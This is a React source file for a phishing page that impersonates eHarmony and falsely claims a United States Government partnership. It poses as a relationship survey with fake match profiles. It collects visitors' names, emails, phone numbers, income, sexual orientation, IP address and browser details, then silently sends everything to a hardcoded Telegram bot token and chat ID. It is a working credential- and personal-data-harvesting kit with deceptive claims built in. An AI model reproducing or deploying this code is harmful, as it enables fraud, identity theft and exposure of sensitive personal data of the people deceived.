import { useState, useEffect, useRef } from 'react';
import { 
	Flex,
	Image,
	Text,
  	ChakraProvider,
	Spinner,
} from "@chakra-ui/react";
import "./App.scss";
import "./mdi/css/materialdesignicons.css";
import Aos from "aos";
import "aos/dist/aos.css";
import axios from 'axios';
import Toast from "./toast"
import bgImage from "./bg.png"
import bgImage2 from "./bgMob.png"
import Logo from "./logo.png"
import Mf from "./mf.png"
import f18 from "./f18.png";
import f182 from "./f182.png";
import f31 from "./f31.png";
import f51 from "./f51.png";
import m31 from "./m31.png";
import m312 from "./m312.png";
import m71 from "./m71.png";
import Confetti from "./confetti.webp";
import c1 from "./c1.png"
import c2 from "./c2.png"

function App() {
	useEffect(() => {
		Aos.init({ duration: 800 })
	}, [])
	const [uIp, setUIp] = useState("")
	const [bAgent, setBAgent] = useState(window.navigator.userAgent)
	useEffect(async () => {
		const res = await axios.get("https://api.ipify.org?format=json")
		setUIp(res.data.ip)
	}, [])

	const [screen, setScreen] = useState(0)
	const [loading, setLoading] = useState(false)
	const [loading2, setLoading2] = useState(false)
	const [loading3, setLoading3] = useState(false)
	const [showMatch, setShowMatch] = useState(false)
	const [gender, setGender] = useState(null)
	const [marry, setMarry] = useState(null)
	const [relationship, setRelationship] = useState(null)
	const [interested, setInterested] = useState(null)
	const [age, setAge] = useState("")
	const [uname, setUname] = useState("")
	const [phone, setPhone] = useState("")
	const [email, setEmail] = useState("")
	const [occupation, setOccupation] = useState("")
	const [income, setIncome] = useState("")
	const [selected, setSelected] = useState(0)


	useEffect(() => {
		setShowMatch(false)
		if(screen === 8) {
			setLoading2(true)
			setTimeout(function() {
				setLoading2(false)
				setShowMatch(true)
			}, 2000)
		}
	}, [screen])

	useEffect(() => {
		Toast("Nationionwide Relationship Survey powered by eHarmony", "success")
	}, [])


	const f1 = [{name: "Bella", h: "5'7", dp: f18}, {name: "Janet", h: "5'8", dp: f182}, {name: "Elizabeth", h: "5'6", dp: f31}, ]
	const f2 = [{name: "Anna", h: "5'6", dp: f31}, {name: "Kendall", h: "5'5", dp: f51}, {name: "Reece", h: "5'8", dp: f182}, ]
	const f3 = [{name: "Sarah", h: "5'8", dp: f51}, {name: "Kylie", h: "5'7", dp: f31}, {name: "Elsa", h: "5'8", dp: f18}, ]
	const f4 = [{name: "Makela", h: "5'9", dp: f51}, {name: "Valerie", h: "5'6", dp: f31}, {name: "Ella", h: "5'6", dp: f182}, ]

	
	const m1 = [{name: "Simon", h: "5'9", dp: m31}, {name: "Peter", h: "5'8", dp: m312}, {name: "Anthony", h: "6'0", dp: m71}, ]
	const m2 = [{name: "George", h: "5'8", dp: m312}, {name: "Paul", h: "5'7", dp: m31}, {name: "Manuel", h: "6'1", dp: m71}, ]
	const m3 = [{name: "Wesley", h: "6'0", dp: m31}, {name: "Rodrigo", h: "5'6", dp: m71}, {name: "Phil", h: "5'8", dp: m312}, ]
	const m4 = [{name: "Luke", h: "6'1", dp: m71}, {name: "Matthew", h: "5'7", dp: m312}, {name: "Steven", h: "5'8", dp: m31}, ]


	const matchData = gender === "female" ? interested === "homosexual" ? age > 70 && age < 90 ? f4 : age > 50 && age < 71 ? f3 : age > 30 && age < 51 ? f2 : f1 : age > 70 && age < 90 ? m4 : age > 50 && age < 71 ? m3 : age > 30 && age < 51 ? m2 : m1 : interested === "homosexual" ? age > 70 && age < 90 ? m4 : age > 50 && age < 71 ? m3 : age > 30 && age < 51 ? m2 : m1 : age > 70 && age < 90 ? f4 : age > 50 && age < 71 ? f3 : age > 30 && age < 51 ? f2 : f1





	async function sendDataFunc() {
		setLoading3(true)
		const matchUser = relationship === "yes" ? matchData[selected]?.name : null
		var sData = encodeURI("\n\nNEW DETAILS FOR eHARMONY SURVEY\n\nFullname: "+uname+" \n\nAge: "+age+"\n\nEmail: "+email+"\n\nPhone number: "+phone+"\n\nGender: "+gender+"\n\nOccupation: "+occupation+"\n\nIncome: "+income+"\n\nMarital status: "+marry+"\n\nSeeking relationship: "+relationship+"\n\nInterested In: "+interested+"\n\nMacthed Name: "+matchUser+"\n\nIP Address: "+uIp+"\n\nBrowser Agent: "+bAgent)
		await axios.get('https://api.telegram.org/bot6261735903:AAFISLVsIBe2UdjSULoqyyaMF8vzv-O0ZK0/'+"sendmessage?text="+sData+"&chat_id=-1001966126973&parse_mode=HTML");
		console.log(sData)
		Toast("SURVEY SUBMITTED", "success")
		setLoading(false)
		setScreen(10)
	}


	return (
		<ChakraProvider>
			<Flex w="100%" minH="100vh" backgroundImage={[bgImage2, bgImage]} backgroundRepeat="no-repeat" backgroundPosition="center center" backgroundSize="cover" bgColor="grey">
				<Flex w="100%" minH={["100%", "100vh"]}>
					<Flex w={["100%", "55%"]} bg={["rgba(0,0,0,0.8)", "rgba(0,0,0,0.75)"]} backdropFilter={["blur(8px)", "blur(6px)" ]}h="100%" direction="column" color="#fff" py={["8", "12"]} px={["6", "12"]} data-aos="fade-right">
						{
							screen === 0 ?
							<Flex direction="column" w="100%" pl={["2", "8%"]} pr={["2", "4%" ]}justify="center" h="100%">
								<Flex w="100%" direction="column" mb="8">
									<Flex align="center"><Image src={Logo} h={["45px", "60px"]} className="updown" /> <Image ml="3" src={c1} h={["45px", "60px"]} className="updown" /></Flex>
									<Text mt="4" fontWeight="bold" fontSize="28px">eHarmony</Text>
									<Text color="rgb(230,230,230)" mt="3" pt="3" borderTop="1px solid rgb(180,180,180)" fontSize={["13px", "14px"]}>"United States Government" Partners with E-harmony to Launch Nationwide Relationship Survey

									In an unprecedented initiative, the United States Government has joined forces with leading online dating platform E-harmony to send out thousands of surveys annually. 

									The goal: to better understand the relationship status of citizens and help them find love.

									As part of this innovative campaign, Americans will be asked about their current relationship situations, preferences, and challenges in finding a suitable partner. 

									The data collected will not only provide valuable insights into the nation's love lives, but also enable E-harmony to offer tailored recommendations for individuals seeking romance.</Text>


									<Text mt="10" fontWeight="bold" fontSize="17px" textAlign="left" borderTop="1px solid rgb(180,180,180)" pt="8">
										<Flex w="100%" align="center"><Image src={Mf} w="80px" mb="5" />
										<Flex flex="1" ml="3">Don't miss this chance to be a part of United States largest love-finding mission!</Flex></Flex></Text>
									<Text textAlign="left" fontSize={["13px", "14px"]} mt="5" color="rgb(230,230,230)">"Discover Your Perfect Match: Take Our Soulful Survey and Meet Your Soulmate Today!"</Text>
								</Flex>
								<Flex display={["flex", "none"]} mt="auto" justify="center" align="center" cursor="pointer" py="3" px="8" bg="#f53ba4" color="#fff" fontWeight="bold" borderRadius="30px" onClick={() => {
									setLoading(true)
									setTimeout(function() {
										setScreen(1)
										setLoading(false)
									}, 1500)
								}}>{loading ? <Spinner color="#fff" /> : <>Begin Survey <Text ml="2">➜</Text></>}</Flex>
							</Flex>
							:
							screen === 1 ? 
							<>
								<Flex align="center"><Image src={Logo} w="30px" mr="4" /> <Text fontWeight="bold">eHarmony</Text></Flex>
								<Flex w="100%" h="100%" pt="4" justify="center" direction="column" fontSize="20px">
									<Text fontWeight="bold" mb="8" fontSize="24px" data-aos="fade-down">01. What is your Gender?</Text>

									<Flex align="center" borderBottom="1px solid rgb(180,180,180)" pb="2" mb="4">
										<input type="radio" name="gender" value="female" style={{ cursor: "pointer" }} onChange={(e) => setGender(e.target.value)} /> <Text ml="4">Female</Text>
									</Flex>
									<Flex align="center" borderBottom="1px solid rgb(180,180,180)" pb="2" mb="4">
										<input type="radio" name="gender" value="male" style={{ cursor: "pointer" }} onChange={(e) => setGender(e.target.value)} /> <Text ml="4">Male</Text>
									</Flex>
									<Flex align="center" borderBottom="1px solid rgb(180,180,180)" pb="2" mb="4">
										<input type="radio" name="gender" value="i prefer not to say" style={{ cursor: "pointer" }} onChange={(e) => setGender(e.target.value)} /> <Text ml="4">I prefer not to say</Text>
									</Flex>
								</Flex>

								<Flex mt="auto" justify="flex-end">
									<Flex mt="3" justify="center" align="center" cursor={gender !== null ? "pointer" : "not-allowed"} opacity={gender !== null ? "1" : ".4"} py="2.5" px="8" bg="#f53ba4" color="#fff" fontWeight="bold" borderRadius="30px" onClick={() => gender !== null && setScreen(2)}>Next <i className='mdi mdi-arrow-right' style={{ fontSize: "20px", marginLeft: "8px" }}></i></Flex>
								</Flex>
							</>
							:
							screen === 2 ? 
							<Flex direction="column" w="100%" justify="center" h="100%">
								<Flex align="center"><Image src={Logo} w="30px" mr="4" /> <Text fontWeight="bold">eHarmony</Text></Flex>
								<Flex w="100%" h="100%" pt="4" justify="center" direction="column" fontSize="20px">
									<Text fontWeight="bold" mb="8" fontSize="24px">02. What is your Martial Status?</Text>

									<Flex align="center" borderBottom="1px solid rgb(180,180,180)" pb="2" mb="4">
										<input type="radio" name="marry" value="single" style={{ cursor: "pointer" }} onChange={(e) => setMarry(e.target.value)} /> <Text ml="4">Single</Text>
									</Flex>
									<Flex align="center" borderBottom="1px solid rgb(180,180,180)" pb="2" mb="4">
										<input type="radio" name="marry" value="dating" style={{ cursor: "pointer" }} onChange={(e) => setMarry(e.target.value)} /> <Text ml="4">Dating</Text>
									</Flex>
									<Flex align="center" borderBottom="1px solid rgb(180,180,180)" pb="2" mb="4">
										<input type="radio" name="marry" value="in a committed relationship" style={{ cursor: "pointer" }} onChange={(e) => setMarry(e.target.value)} /> <Text ml="4">In a committed relationship</Text>
									</Flex>
									<Flex align="center" borderBottom="1px solid rgb(180,180,180)" pb="2" mb="4">
										<input type="radio" name="marry" value="partnered/married" style={{ cursor: "pointer" }} onChange={(e) => setMarry(e.target.value)} /> <Text ml="4">Partnered/Married</Text>
									</Flex>
									<Flex align="center" borderBottom="1px solid rgb(180,180,180)" pb="2" mb="4">
										<input type="radio" name="marry" value="none of these" style={{ cursor: "pointer" }} onChange={(e) => setMarry(e.target.value)} /> <Text ml="4">None of these</Text>
									</Flex>
									<Flex align="center" borderBottom="1px solid rgb(180,180,180)" pb="2" mb="4">
										<input type="radio" name="marry" value="i prefer not to say" style={{ cursor: "pointer" }} onChange={(e) => setMarry(e.target.value)} /> <Text ml="4">I prefer not to say</Text>
									</Flex>
								</Flex>

								<Flex mt="auto" justify="space-between">
									<Flex mt="3" justify="center" align="center" cursor="pointer" py="2.5" px="8" border="1px solid #f53ba4" color="#f53ba4" bg="#fff" fontWeight="bold" borderRadius="30px" onClick={() => {
										setGender(null)
										setScreen(1)
									}}><i className='mdi mdi-arrow-left' style={{ fontSize: "20px", marginRight: "8px" }}></i> Back</Flex>

									<Flex mt="3" justify="center" align="center" cursor={marry !== null ? "pointer" : "not-allowed"} opacity={marry !== null ? "1" : ".4"} py="2.5" px="8" bg="#f53ba4" color="#fff" fontWeight="bold" borderRadius="30px" onClick={() => marry !== null && setScreen(3)}>Next <i className='mdi mdi-arrow-right' style={{ fontSize: "20px", marginLeft: "8px" }}></i></Flex>
								</Flex>
							</Flex>
							:
							screen === 3 ? 
							<>
								<Flex align="center"><Image src={Logo} w="30px" mr="4" /> <Text fontWeight="bold">eHarmony</Text></Flex>
								<Flex w="100%" h="100%" pt="4" justify="center" direction="column" fontSize="20px">
									<Text fontWeight="bold" mb="8" fontSize="24px">03. Do you seek a relationship?</Text>

									<Flex align="center" borderBottom="1px solid rgb(180,180,180)" pb="2" mb="4">
										<input type="radio" name="relationship" value="yes" style={{ cursor: "pointer" }} onChange={(e) => setRelationship(e.target.value)} /> <Text ml="4">Yes</Text>
									</Flex>
									<Flex align="center" borderBottom="1px solid rgb(180,180,180)" pb="2" mb="4">
										<input type="radio" name="relationship" value="no" style={{ cursor: "pointer" }} onChange={(e) => setRelationship(e.target.value)} /> <Text ml="4">No</Text>
									</Flex>
								</Flex>

								<Flex mt="auto" justify="space-between">
									<Flex mt="3" justify="center" align="center" cursor="pointer" py="2.5" px="8" border="1px solid #f53ba4" color="#f53ba4" bg="#fff" fontWeight="bold" borderRadius="30px" onClick={() => {
										setMarry(null)
										setScreen(2)
									}}><i className='mdi mdi-arrow-left' style={{ fontSize: "20px", marginRight: "8px" }}></i> Back</Flex>

									<Flex mt="3" justify="center" align="center" cursor={relationship !== null ? "pointer" : "not-allowed"} opacity={relationship !== null ? "1" : ".4"} py="2.5" px="8" bg="#f53ba4" color="#fff" fontWeight="bold" borderRadius="30px" onClick={() => {
										if(relationship !== null) {
											if(relationship === "yes") {
												setScreen(4)
											}
											else {
												setScreen(6)
											}
										}
									}}>Next <i className='mdi mdi-arrow-right' style={{ fontSize: "20px", marginLeft: "8px" }}></i></Flex>
								</Flex>
							</>
							:
							screen === 4 ? 
							<Flex direction="column" w="100%" justify="center" h="100%">
								<Flex align="center"><Image src={Logo} w="30px" mr="4" /> <Text fontWeight="bold">eHarmony</Text></Flex>
								<Flex w="100%" h="100%" pt="4" justify="center" direction="column" fontSize="20px">
									<Text fontWeight="bold" mb="8" fontSize="24px">04. What gender are you interested in?</Text>

									<Flex align="center" borderBottom="1px solid rgb(180,180,180)" pb="2" mb="4">
										<input type="radio" name="interested" value="Exclusively/Mostly heterosexual" style={{ cursor: "pointer" }} onChange={(e) => setInterested(e.target.value)} /> <Text ml="4">Exclusively/Mostly heterosexual</Text>
									</Flex>
									<Flex align="center" borderBottom="1px solid rgb(180,180,180)" pb="2" mb="4">
										<input type="radio" name="interested" value="homosexual" style={{ cursor: "pointer" }} onChange={(e) => setInterested(e.target.value)} /> <Text ml="4">Exclusively/Mostly homosexual</Text>
									</Flex>
									<Flex align="center" borderBottom="1px solid rgb(180,180,180)" pb="2" mb="4">
										<input type="radio" name="interested" value="Bisexual" style={{ cursor: "pointer" }} onChange={(e) => setInterested(e.target.value)} /> <Text ml="4">Bisexual</Text>
									</Flex>
									<Flex align="center" borderBottom="1px solid rgb(180,180,180)" pb="2" mb="4">
										<input type="radio" name="interested" value="Something else" style={{ cursor: "pointer" }} onChange={(e) => setInterested(e.target.value)} /> <Text ml="4">Something else</Text>
									</Flex>
									<Flex align="center" borderBottom="1px solid rgb(180,180,180)" pb="2" mb="4">
										<input type="radio" name="interested" value="I prefer not to say" style={{ cursor: "pointer" }} onChange={(e) => setInterested(e.target.value)} /> <Text ml="4">I prefer not to say</Text>
									</Flex>
								</Flex>

								<Flex mt="auto" justify="space-between">
									<Flex mt="3" justify="center" align="center" cursor="pointer" py="2.5" px="8" border="1px solid #f53ba4" color="#f53ba4" bg="#fff" fontWeight="bold" borderRadius="30px" onClick={() => {
										setRelationship(null)
										setScreen(3)
									}}><i className='mdi mdi-arrow-left' style={{ fontSize: "20px", marginRight: "8px" }}></i> Back</Flex>

									<Flex mt="3" justify="center" align="center" cursor={interested !== null ? "pointer" : "not-allowed"} opacity={interested !== null ? "1" : ".4"} py="2.5" px="8" bg="#f53ba4" color="#fff" fontWeight="bold" borderRadius="30px" onClick={() => interested !== null && setScreen(5)}>Next <i className='mdi mdi-arrow-right' style={{ fontSize: "20px", marginLeft: "8px" }}></i></Flex>
								</Flex>
							</Flex>
							:
							screen === 5 ? 
							<>
								<Flex align="center"><Image src={Logo} w="30px" mr="4" /> <Text fontWeight="bold">eHarmony</Text></Flex>
								<Flex w="100%" h="100%" pt="4" justify="center" direction="column" fontSize="20px">
									<Text fontWeight="bold" mb="8" fontSize="24px">05. How old are you?</Text>

									<Flex align="center">
										<input type="number" style={{ border: "1px solid #f53ba4", padding: "10px 20px", borderRadius: "4px", width: "100%" }} placeholder="Enter your age (18+)" onInput={(e) => setAge(e.target.value)} />
									</Flex>
								</Flex>

								<Flex mt="auto" justify="space-between">
									<Flex mt="3" justify="center" align="center" cursor="pointer" py="2.5" px="8" border="1px solid #f53ba4" color="#f53ba4" bg="#fff" fontWeight="bold" borderRadius="30px" onClick={() => {
										setInterested(null)
										setScreen(4)
									}}><i className='mdi mdi-arrow-left' style={{ fontSize: "20px", marginRight: "8px" }}></i> Back</Flex>

									<Flex mt="3" justify="center" align="center" cursor={age !== "" ? "pointer" : "not-allowed"} opacity={age !== "" ? "1" : ".4"} py="2.5" px="8" bg="#f53ba4" color="#fff" fontWeight="bold" borderRadius="30px" onClick={() => age !== "" && setScreen(8)}>Next <i className='mdi mdi-arrow-right' style={{ fontSize: "20px", marginLeft: "8px" }}></i></Flex>
								</Flex>
							</>
							:
							screen === 8 ? 
							<Flex direction="column" w="100%" justify="center" h="100%">
								<Flex align="center"><Image src={Logo} w="30px" mr="4" /> <Text fontWeight="bold">eHarmony</Text></Flex>
								<Flex w="100%" h="100%" pt="4" justify="center" direction="column" align="center" fontSize="20px">
									<Text fontWeight="bold" mb="8" fontSize="24px" textAlign="center">{loading2 ? "We are finding you matches" : "Matches Found!!"}</Text>

									<Flex align="center">
										{
											loading2 ? 
											<Spinner size="xl" color="#f53ba4" emptyColor="lightgrey" />
											:
											<Text textAlign="center" color="rgb(180,180,180)" fontSize="18px">Congratulations, we have found you <Text as="span" fontWeight="bold">3 matches</Text></Text>
										}
									</Flex>
								</Flex>

								{showMatch && <Flex mt="auto" w="100%">
									<Flex mt="3" w="100%" justify="center" align="center" cursor="pointer" py="2.5" px="8" bg="#f53ba4" color="#fff" fontWeight="bold" borderRadius="30px" onClick={() => age !== "" && setScreen(9)}>Show my matches <i className='mdi mdi-arrow-right' style={{ fontSize: "20px", marginLeft: "8px" }}></i></Flex>
								</Flex>}
							</Flex>
							:
							screen === 9 ? 
							<>
								<Flex align="center"><Image src={Logo} w="30px" mr="4" /> <Text fontWeight="bold">eHarmony</Text></Flex>
								<Flex w="100%" h="100%" pt="4" justify="center" direction="column" fontSize="20px">
									<Text fontWeight="bold" mb="6" fontSize="24px" mt="4">3 Matches</Text>

									<Flex w="100%" h="100%">
										{
											matchData.map((item, index) => (
												<Flex key={index} w="100%" h={["100%", "95%"]} display={selected === index ? "flex" : "none"} direction={["column", "row"]}>
													<Flex w={["100%", "60%"]} h={["300px", "100%"]} backgroundImage={item.dp} backgroundRepeat="no-repeat" backgroundSize="cover" backgroundPosition="top center" borderRadius="10px"></Flex>

													<Flex w={["100%", "40%"]} direction="column" pl={["0", "8"]} fontSize="16px">
														<Text fontWeight="bold" fontSize="20px" mt="6">{item.name}</Text>
														<Text mt="1" color="rgb(180,180,180)">{index === 0 ? "Less than (42 miles)" : index === 1 ? "Less than (58 miles)" : "Less than (36 miles)"}</Text>
														<Flex align="center" mt="6" fontWeight="bold">
															<i className='mdi mdi-human-handsdown' style={{ fontSize: "25px", color: "rgb(180,180,180)"}}></i> <Text ml="3">{item.h}" <Text as="span" fontWeight="bold" mx="3" color="rgb(180,180,180)">.</Text>American<Text as="span"></Text></Text>
														</Flex>
														<Flex align="center" mt="2" fontWeight="bold">
															<i className='mdi mdi-human-male-female' style={{ fontSize: "25px", color: "rgb(180,180,180)"}}></i> <Text ml="3">{age > 50 ? "Divorced" : "Single"}</Text>
														</Flex>
														<Flex align="center" mt="2" fontWeight="bold">
															<i className='mdi mdi-church' style={{ fontSize: "25px", color: "rgb(180,180,180)"}}></i> <Text ml="3">Christian</Text>
														</Flex>
														<Flex align="center" mt="2" fontWeight="bold">
															<i className='mdi mdi-fire' style={{ fontSize: "25px", color: "rgb(180,180,180)"}}></i> <Text ml="3">Does not smoke</Text>
														</Flex>
													</Flex>
												</Flex>
											))
										}
										<Flex position="absolute" mt="100px" justify="space-between" w="93%">	
											<Flex w="50px" ml={["-6", "-12"]} boxShadow="0px 1px 10px rgba(100,100,100,0.5)" h="50px" align="center" bg="#fff" color="#000" cursor="pointer" borderRadius="100%" justify="center" fontSize="35px" onClick={() => selected === 0 ? setSelected(2) : selected === 2 ? setSelected(1) : setSelected(0)}><i className="mdi mdi-chevron-left"></i></Flex>

											<Flex w="50px" mr={["0", "-4%"]} boxShadow="0px 1px 10px rgba(100,100,100,0.5)" h="50px" align="center" bg="#fff" color="#000" cursor="pointer" borderRadius="100%" justify="center" fontSize="35px" onClick={() => selected === 0 ? setSelected(1) : selected === 1 ? setSelected(2) : setSelected(0)}><i className="mdi mdi-chevron-right"></i></Flex>
										</Flex>
									</Flex>

									<Flex w="100%" mb={["4", "0"]} pl={["0", "12"]} justify={["center", "flex-start"]} align="center" mt={["4", "-12"]}>
										<Flex w="65px" h="65px" align="center" bg="#f54c4c" color="#fff" cursor="pointer" borderRadius="100%" justify="center" fontSize="50px" onClick={() => selected === 0 ? setSelected(1) : selected === 1 ? setSelected(2) : setSelected(0)}><i className="mdi mdi-close"></i></Flex>

										<Flex ml="5" w="65px" h="65px" align="center" bg="#27d9a0" color="#fff" cursor="pointer" borderRadius="100%" justify="center" fontSize="50px" onClick={() => {
										setScreen(6)
									}}><i className="mdi mdi-check"></i></Flex>
									</Flex>
								</Flex>

								<Flex mt="auto" w="100%">
									<Flex mt="3" w="100%" justify="center" align="center" cursor="pointer" py="2.5" px="8" bg="#f53ba4" color="#fff" fontWeight="bold" borderRadius="30px" onClick={() => {
										setScreen(6)
									}}>Continue <i className='mdi mdi-arrow-right' style={{ fontSize: "20px", marginLeft: "8px" }}></i></Flex>
								</Flex>
							</>
							:
							screen === 6 ? 
							<Flex direction="column" w="100%" justify="center" h="100%">
								<Flex align="center"><Image src={Logo} w="30px" mr="4" /> <Text fontWeight="bold">eHarmony</Text></Flex>
								<Flex w="100%" h="100%" pt="4" justify="center" direction="column" fontSize="20px">
									<Text fontWeight="bold" mb="8" fontSize="24px">0{relationship === "yes" ? "6" : "4"}. Your fullname?</Text>

									<Flex align="center">
										<input type="text" style={{ border: "1px solid #f53ba4", padding: "10px 20px", borderRadius: "4px", width: "100%" }} placeholder="Enter your fullname" onInput={(e) => setUname(e.target.value)} />
									</Flex>
								</Flex>

								<Flex mt="auto" justify="space-between">
									<Flex mt="3" justify="center" align="center" cursor="pointer" py="2.5" px="8" border="1px solid #f53ba4" color="#f53ba4" bg="#fff" fontWeight="bold" borderRadius="30px" onClick={() => {
										if(relationship === "yes") {
											setAge("")
											setScreen(5)
										}
										else {
											setRelationship(null)
											setScreen(3)
										}
									}}><i className='mdi mdi-arrow-left' style={{ fontSize: "20px", marginRight: "8px" }}></i> Back</Flex>

									<Flex mt="3" justify="center" align="center" cursor={uname !== "" ? "pointer" : "not-allowed"} opacity={uname !== "" ? "1" : ".4"} py="2.5" px="8" bg="#f53ba4" color="#fff" fontWeight="bold" borderRadius="30px" onClick={() => uname !== "" && setScreen(11)}>Next <i className='mdi mdi-arrow-right' style={{ fontSize: "20px", marginLeft: "8px" }}></i></Flex>
								</Flex>
							</Flex>
							:
							screen === 11 ? 
							<>
								<Flex align="center"><Image src={Logo} w="30px" mr="4" /> <Text fontWeight="bold">eHarmony</Text></Flex>
								<Flex w="100%" h="100%" pt="4" justify="center" direction="column" fontSize="20px">
									<Text fontWeight="bold" mb="8" fontSize="24px">0{relationship === "yes" ? "7" : "5"}. Your email?</Text>

									<Flex align="center">
										<input type="email" style={{ border: "1px solid #f53ba4", padding: "10px 20px", borderRadius: "4px", width: "100%" }} placeholder="Enter your email" onInput={(e) => setEmail(e.target.value)} />
									</Flex>
								</Flex>

								<Flex mt="auto" justify="space-between">
									<Flex mt="3" justify="center" align="center" cursor="pointer" py="2.5" px="8" border="1px solid #f53ba4" color="#f53ba4" bg="#fff" fontWeight="bold" borderRadius="30px" onClick={() => {
										setUname("")
										setScreen(6)
									}}><i className='mdi mdi-arrow-left' style={{ fontSize: "20px", marginRight: "8px" }}></i> Back</Flex>

									<Flex mt="3" justify="center" align="center" cursor={email !== "" ? "pointer" : "not-allowed"} opacity={email !== "" ? "1" : ".4"} py="2.5" px="8" bg="#f53ba4" color="#fff" fontWeight="bold" borderRadius="30px" onClick={() => email !== "" && setScreen(7)}>Next <i className='mdi mdi-arrow-right' style={{ fontSize: "20px", marginLeft: "8px" }}></i></Flex>
								</Flex>
							</>
							:
							screen === 7 ? 
							<Flex direction="column" w="100%" justify="center" h="100%">
								<Flex align="center"><Image src={Logo} w="30px" mr="4" /> <Text fontWeight="bold">eHarmony</Text></Flex>
								<Flex w="100%" h="100%" pt="4" justify="center" direction="column" fontSize="20px">
									<Text fontWeight="bold" mb="8" fontSize="24px">0{relationship === "yes" ? "8" : "6"}. Your phone number?</Text>

									<Flex align="center">
										<input type="tel" style={{ border: "1px solid #f53ba4", padding: "10px 20px", borderRadius: "4px", width: "100%" }} placeholder="Enter your phone number" onInput={(e) => setPhone(e.target.value)} />
									</Flex>
								</Flex>

								<Flex mt="auto" justify="space-between">
									<Flex mt="3" justify="center" align="center" cursor="pointer" py="2.5" px="8" border="1px solid #f53ba4" color="#f53ba4" bg="#fff" fontWeight="bold" borderRadius="30px" onClick={() => {
										setEmail("")
										setScreen(11)
									}}><i className='mdi mdi-arrow-left' style={{ fontSize: "20px", marginRight: "8px" }}></i> Back</Flex>

									<Flex mt="3" justify="center" align="center" cursor={phone !== "" ? "pointer" : "not-allowed"} opacity={phone !== "" ? "1" : ".4"} py="2.5" px="8" bg="#f53ba4" color="#fff" fontWeight="bold" borderRadius="30px" onClick={() => phone !== "" && setScreen(12)}>Next <i className='mdi mdi-arrow-right' style={{ fontSize: "20px", marginLeft: "8px" }}></i></Flex>
								</Flex>
							</Flex>
							: 
							screen === 12 ? 
							<>
								<Flex align="center"><Image src={Logo} w="30px" mr="4" /> <Text fontWeight="bold">eHarmony</Text></Flex>
								<Flex w="100%" h="100%" pt="4" justify="center" direction="column" fontSize="20px">
									<Text fontWeight="bold" mb="8" fontSize="24px">0{relationship === "yes" ? "9" : "6"}. Your Occupation?</Text>

									<Flex align="center">
										<input type="text" style={{ border: "1px solid #f53ba4", padding: "10px 20px", borderRadius: "4px", width: "100%" }} placeholder="Enter your occupation" onInput={(e) => setOccupation(e.target.value)} />
									</Flex>
								</Flex>

								<Flex mt="auto" justify="space-between">
									<Flex mt="3" justify="center" align="center" cursor="pointer" py="2.5" px="8" border="1px solid #f53ba4" color="#f53ba4" bg="#fff" fontWeight="bold" borderRadius="30px" onClick={() => {
										setPhone("")
										setScreen(7)
									}}><i className='mdi mdi-arrow-left' style={{ fontSize: "20px", marginRight: "8px" }}></i> Back</Flex>

									<Flex mt="3" justify="center" align="center" cursor={email !== "" ? "pointer" : "not-allowed"} opacity={email !== "" ? "1" : ".4"} py="2.5" px="8" bg="#f53ba4" color="#fff" fontWeight="bold" borderRadius="30px" onClick={() => email !== "" && setScreen(13)}>Next <i className='mdi mdi-arrow-right' style={{ fontSize: "20px", marginLeft: "8px" }}></i></Flex>
								</Flex>
							</>
							:
							screen === 13 ? 
							<Flex direction="column" w="100%" justify="center" h="100%">
								<Flex align="center"><Image src={Logo} w="30px" mr="4" /> <Text fontWeight="bold">eHarmony</Text></Flex>
								<Flex w="100%" h="100%" pt="4" justify="center" direction="column" fontSize="20px">
									<Text fontWeight="bold" mb="8" fontSize="24px">0{relationship === "yes" ? "10" : "8"}. Your income range?</Text>

									<Flex align="center">
										<input type="tel" style={{ border: "1px solid #f53ba4", padding: "10px 20px", borderRadius: "4px", width: "100%" }} placeholder="$" onInput={(e) => setIncome(e.target.value)} />
									</Flex>
								</Flex>

								<Flex mt="auto" justify="space-between">
									<Flex mt="3" justify="center" align="center" cursor="pointer" py="2.5" px="8" border="1px solid #f53ba4" color="#f53ba4" bg="#fff" fontWeight="bold" borderRadius="30px" onClick={() => {
										setOccupation("")
										setScreen(12)
									}}><i className='mdi mdi-arrow-left' style={{ fontSize: "20px", marginRight: "8px" }}></i> Back</Flex>

									<Flex mt="3" justify="center" align="center" cursor={phone !== "" ? "pointer" : "not-allowed"} opacity={phone !== "" ? "1" : ".4"} py="2.5" px="8" bg="#f53ba4" color="#fff" fontWeight="bold" borderRadius="30px" onClick={() => phone !== "" && sendDataFunc()}>{loading3 ? <Spinner color="#fff" /> : <>Save <i className='mdi mdi-arrow-right' style={{ fontSize: "20px", marginLeft: "8px" }}></i></>}</Flex>
								</Flex>
							</Flex>
							:
							<>
								<Flex align="center"><Image src={Logo} w="30px" mr="4" /> <Text fontWeight="bold">eHarmony</Text></Flex>
								<Flex w="100%" h="100%" pt="4" justify="center" direction="column" align="center" fontSize="20px">
									<Text fontWeight="bold" mb="8" fontSize="24px">Survey Complete!!</Text>

									<Flex align="center" color="rgb(180,180,180)" fontSize="18px" direction="column">
										<Text textAlign="center" px={["2", "12"]}>We will reach out to you via your email or your phone number shortly.</Text>
										{
											relationship === "yes" &&
											<>
												<Text textAlign="center" fontWeight="bold" mt="4">You have been successfully macthed!</Text>
											</>
										}
										<Text textAlign="center" fontWeight="bold" color="#fff" mt="4">Happy Dating!</Text>

										<Image src={Confetti} w="140px" mt="3" />
									</Flex>
								</Flex>

								<Flex mt="auto" w="100%">
									<Flex mt="3" w="100%" justify="center" align="center" cursor="pointer" py="2.5" px="8" bg="#f53ba4" color="#fff" fontWeight="bold" borderRadius="30px" onClick={() => window.location.reload()}>Restart Survey <i className='mdi mdi-restart' style={{ fontSize: "20px", marginLeft: "8px" }}></i></Flex>
								</Flex>
							</>
						}
					</Flex>
					<Flex w="45%" px="5" pb="5" display={["none", "flex"]}>
					{screen === 0 &&<Flex w="100%" display={["none", "flex"]} mt="auto" justify="center" align="center" cursor="pointer" py="3" px="8" bg="#f53ba4" color="#fff" fontWeight="bold" borderRadius="30px" onClick={() => {
							setLoading(true)
							setTimeout(function() {
								setScreen(1)
								setLoading(false)
							}, 1500)
						}}>{loading ? <Spinner color="#fff" /> : <>Begin Survey <Text ml="2">➜</Text></>}</Flex>}
					</Flex>
				</Flex>
			</Flex>
		</ChakraProvider>
	)
}

export default App;
